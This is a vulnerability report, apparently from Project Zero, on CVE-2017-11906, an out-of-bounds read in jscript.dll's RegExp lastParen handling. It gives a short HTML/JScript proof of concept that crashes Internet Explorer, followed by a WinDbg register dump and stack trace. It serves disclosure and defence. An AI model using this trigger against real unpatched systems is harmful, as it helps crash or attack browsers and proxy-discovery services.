Windows: out-of-bounds read in jscript!RegExpFncObj::LastParen CVE-2017-11906 There is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places): PoC for IE (note: page heap might be required to obsorve the crash): ========================================= <!-- saved from url=(0014)about:internet --> <meta http-equiv="X-UA-Compatible" content="IE=8"></meta> <script language="Jscript.Encode"> function go() { var r= new RegExp(Array(100).join('()')); ''.search(r); alert(RegExp.lastParen); } go(); </script> ========================================= Debug log: ========================================= (cec.a14): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. jscript!RegExpFncObj::LastParen+0x43: 000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=???????? 0:014> r rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063 rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0 rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148 <a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>=00000000130f9210 <a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>=0000000000000000 <a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>=000000000463fef0 <a href="https://crrev.com/11" title="" class="" rel="nofollow">r11</a>=000000000463ff38 <a href="https://crrev.com/12" title="" class="" rel="nofollow">r12</a>=0000000000000083 <a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>=0000000000000000 <a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>=00000000130f9210 <a href="https://crrev.com/15" title="" class="" rel="nofollow">r15</a>=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 jscript!RegExpFncObj::LastParen+0x43: 000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=???????? 0:014> k # Child-SP RetAddr Call Site 00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43 01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5 02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873 03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373 04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162 05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3 06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea 07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6 08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162 09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7 0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e 0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a 0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267 0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56 0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1 0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f 10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9 11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283 12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101 13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235 14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90 15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb 16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f 17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70 18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1 19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43 1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41 1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240 1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150 1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad 1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5 1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555 20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3 21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f 22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f 23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd 24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d ========================================= This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: ifratric